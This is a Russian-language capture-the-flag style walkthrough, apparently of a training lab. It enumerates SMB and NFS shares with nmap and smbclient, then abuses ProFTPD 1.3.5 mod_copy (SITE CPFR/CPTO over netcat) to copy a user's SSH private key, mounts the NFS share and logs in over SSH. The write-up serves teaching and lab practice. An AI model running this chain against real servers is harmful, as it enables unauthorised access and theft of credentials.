Сканирование хоста на наличае расшареных папок

# Сканирование хоста на наличае расшареных папок ## Основное сканирование Просканировать сеть на наличе открытых портов ```bash= nmap -sV -vv -sS atackhost ``` ![](https://i.imgur.com/7r2PK6L.png) Результат сканирования показал открытые портами `139, 445` Выполнение сканирования с использованием скриптов для определения количества расшареных папок ```bash= nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse atackhost ``` ![](https://i.imgur.com/OF1HObh.png) Результат сканирования показал какие папки расшарены и к каим есть доступ. Подключение к расшаренной папке ```bash= smbclient //atackhost/share ``` Eсли для расшаренной папки разрешен анонимный доступ, пароль для входа нетребуется ![](https://i.imgur.com/ZgVWsfh.png) Скачивание содержимого расшаренной папки ```bash= smbget -R smb://atackhost/share ``` ## Исследоване дополнительных портов Предыдущее сканирование портов показало, что порт 111 запускает службу rpcbind. Это просто сервер, который преобразует номер программы удаленного вызова процедур (RPC) в универсальные адреса. Когда служба RPC запускается, она сообщает rpcbind адрес, который она прослушивает, и номер программы RPC, которую она готова обслуживать. ```bash= nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount atackhost ``` ![](https://i.imgur.com/Ohyt5vn.png) При сканировании были найден открытый порт `21 - ProFTPD 1.3.5` Модуль mod_copy реализует команды SITE CPFR и SITE CPTO , которые можно использовать для копирования файлов или каталогов из одного места в другое на сервере. Любой неаутентифицированный клиент может использовать эти команды для копирования файлов из любой части файловой системы в выбранное место назначения. Подключение к удаленному хосту, выполнение копирования файлов ```bash= #nc atackhost port nc 10.10.133.53 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.133.53] SITE CPFR /home/kenobi/.ssh/id_rsa 350 File or directory exists, ready for destination name SITE CPTO /var/tmp/id_rsa 250 Copy successful ``` Подключение расшаренной папки и копирование файла ключа ```bash= #mount ip_atack_host:/share local_share sudo mount 10.10.133.53:/var ~/share cp ~/share/tmp/id_rsa ~/ ``` Подключение к удаленному хосту ```bash= ssh -i id_rsa user@10.10.133.53 ```